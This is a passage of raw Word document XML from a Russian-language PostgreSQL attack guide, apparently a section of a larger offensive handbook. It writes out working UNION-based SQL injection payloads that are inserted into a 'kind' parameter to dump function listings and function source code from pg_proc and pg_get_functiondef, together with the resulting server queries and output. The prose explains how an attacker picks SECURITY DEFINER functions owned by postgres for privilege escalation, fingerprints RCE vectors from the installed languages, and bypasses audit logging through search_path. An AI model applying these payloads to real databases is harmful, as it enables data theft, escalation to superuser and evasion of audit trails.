          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        || ' [' || l.lanname || ', owner=' || pg_get_userbyid(p.proowner) || ']',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D69F55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB6901" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_proc p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE81F22" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN pg_namespace n ON p.pronamespace = n.oid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF380A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN pg_language l ON p.prolang = l.oid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F15A590" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE n.nspname NOT IN ('pg_catalog', 'information_schema') --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D3531" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атакующий получает записи вида:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E7542" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public.refresh_materialized(name text) SECURITY DEFINER [plpgsql, owner=postgres]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A956AB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public.audit_event(actor text, action text, payload jsonb) [plpgsql, owner=appwriter]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512C1DE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit.purge_old_events(days integer) SECURITY DEFINER [plpgsql, owner=postgres]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24836FD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public.recalc_balance(uid bigint) [sql, owner=appwriter]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61669E43" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Каждая строка с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>owner=postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — кандидат на 3.13: вызов из application-роли исполняется с правами postgres-superuser. Список языков (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — fingerprint, какие RCE-векторы из 3.7 применимы в кластере (если стоит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.7.3 доступен; если только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RCE через языки не пройдёт).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D266A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_function_arguments(oid)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — официальная функция, рендерит аргументы в форме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>arg1 text, arg2 integer DEFAULT 10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (точно как написано в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Альтернатива через сырой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proargnames</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proargtypes</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proargmodes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> требует ручной склейки и менее читаема.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8E73C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — тело конкретной функции (`prosrc`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228BEF72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После Payload A атакующий выбрал цель — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public.audit_event(actor text, action text, payload jsonb)</w:t>
      </w:r>
      <w:r>
        <w:t>. Нужно тело, чтобы найти inject-точку или понять, что функция делает (например, не пишет ли она в audit-таблицу, которую атакующий хочет обойти).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6DAB9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `kind`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235DF058" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, prosrc, now() FROM pg_proc WHERE oid = 'public.audit_event(text, text, jsonb)'::regprocedure --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DA23ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA131A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, generated_at FROM reports WHERE kind = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF9FB54" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, prosrc, now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B9982" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_proc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD01D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE oid = 'public.audit_event(text, text, jsonb)'::regprocedure --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2B96DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — полное тело plpgsql-функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09470091" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED6637" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    EXECUTE format('INSERT INTO %I.events(actor, action, payload, ts) VALUES ($1, $2, $3, now())', current_schema)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4576ED8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        USING actor, action, payload;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E83FC15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286AA4DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E43C094" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Что атакующий из этого извлекает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283F9EC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Имя audit-таблицы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>events</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — цель для обхода логирования через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path TO ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> перед основной операцией (3.13.2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBABD77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Способ построения SQL внутри функции (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для имени схемы + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для параметров) — оценка, есть ли SQL-инъекция в самой функции. В этом примере код безопасный (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> квотит идентификатор, значения через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Уязвимый антипаттерн — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'INSERT INTO events VALUES (' || actor || ')'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — см. 3.16 (Identifier injection в plpgsql).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3603462A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Косвенно: какие колонки есть в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>events</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (по списку плейсхолдеров) — экономит отдельный запрос к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.8.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A77B1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Альтернатива через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — возвращает полную </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:t>-команду со всеми деталями (язык, volatility, search_path, security_definer):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522B2123" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, pg_get_functiondef('public.audit_event(text, text, jsonb)'::regprocedure), now() --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA3237D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступна тоже PUBLIC и работает для plpgsql/sql/plperl/plpython функций; для C-функций возвращает stub с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS '&lt;lib&gt;', '&lt;symbol&gt;'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для plpython/plperl — возвращает их код целиком, в том числе если функция была создана </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
